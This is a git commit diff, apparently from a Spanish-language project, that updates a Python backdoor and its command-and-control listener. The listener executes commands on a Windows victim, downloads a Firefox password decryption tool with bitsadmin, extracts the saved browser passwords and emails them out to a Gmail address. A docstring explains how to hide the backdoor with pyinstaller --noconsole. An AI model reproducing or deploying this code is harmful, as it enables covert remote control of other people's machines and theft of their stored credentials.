Update backdoor & listener - C2

This commit is contained in:
Manuel Vergara 2024-02-01 19:18:06 +01:00
parent d505f6ee23
commit 3704f6c61e
3 changed files with 27 additions and 27 deletions

Binary file not shown.

View File

@ -1,6 +1,11 @@
# /usr/bin/env python3 # /usr/bin/env python3
""" """
Backdoor Backdoor
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole
pyinstaller --onefile --noconsole listener.py
""" """
import signal import signal

View File

@ -2,22 +2,20 @@
""" """
Listener para el backdoor Listener para el backdoor
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole Para hacer invisible el backdoor se puede utilizar pyinstaller con la
opción --noconsole
pyinstaller --onefile --noconsole listener.py pyinstaller --onefile --noconsole listener.py
""" """
import dotenv import dotenv
import os import os
import requests
import signal import signal
import smtplib import smtplib
import socket import socket
import sys import sys
import tempfile
from email.mime.text import MIMEText from email.mime.text import MIMEText
from termcolor import colored from termcolor import colored
@ -108,12 +106,12 @@ class Listener:
Consigue el profile de firefox Consigue el profile de firefox
""" """
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
command = f"dir {path}"
try: try:
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
command = f"dir {path}"
output_command_dir = self.execute_remotely(command) output_command_dir = self.execute_remotely(command)
profile_line = next(line for line in output_command_dir.split( profile_line = next(line for line in output_command_dir.split(
@ -129,35 +127,32 @@ class Listener:
return None return None
def get_firefox_passwords(self, username, profiles): def get_firefox_passwords(self, username, profiles):
""" """
Extrae las contraseñas guardadas en un profile de firefox Extrae las contraseñas guardadas en un profile de firefox
""" """
url_download = "https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py"
path_download = "%TEMP%\\firefox_decrypt.py"
options_download = "/transfer midescarga /download /priority normal"
command_download = f"bitsadmin {options_download} {url_download} {path_download}"
firefox_profile_path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}" firefox_profile_path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
command = f"python firefox_decrypt.py {firefox_profile_path}" try:
self.execute_remotely(command_download)
r = requests.get( command = f"python %TEMP%\\firefox_decrypt.py {firefox_profile_path}"
"https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py")
self.execute_remotely(f"dir C:\\Users\\{username}\\AppData\\Local\\Temp\\") passwords = self.execute_remotely(command)
print(execute_remotely("dir"))
command_copy = f"echo {r.content} > firefox_decrypt.py"
self.execute_remotely(command_copy)
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir) self.execute_remotely("del %TEMP%\\firefox_decrypt.py")
with open("firefox_decrypt.py", "wb") as f: except Exception as e:
f.write(r.content) print(f"\n[!] Error al obtener las contraseñas de Firefox.\nError: {e}")
passwords = execute_remotely(command) return None
os.remove("firefox_decrypt.py")
return passwords return passwords
@ -167,7 +162,7 @@ class Listener:
""" """
print(colored( print(colored(
"Programa \"Command & Control\" realizado con mucho cariño.\n", "Programa \"Command & Control\" realizado con mucho cariño.\n",
"blue" "blue"
)) ))
@ -210,7 +205,7 @@ class Listener:
if passwords: if passwords:
send_email( self.send_email(
"Decrypted Firefox Passwords INFO", "Decrypted Firefox Passwords INFO",
passwords, passwords,
"keyloggerseginf@gmail.com", "keyloggerseginf@gmail.com",
@ -235,5 +230,5 @@ class Listener:
if __name__ == "__main__": if __name__ == "__main__":
my_listener = Listener("192.168.2.105", 443) my_listener = Listener("192.168.1.119", 443)
my_listener.run() my_listener.run()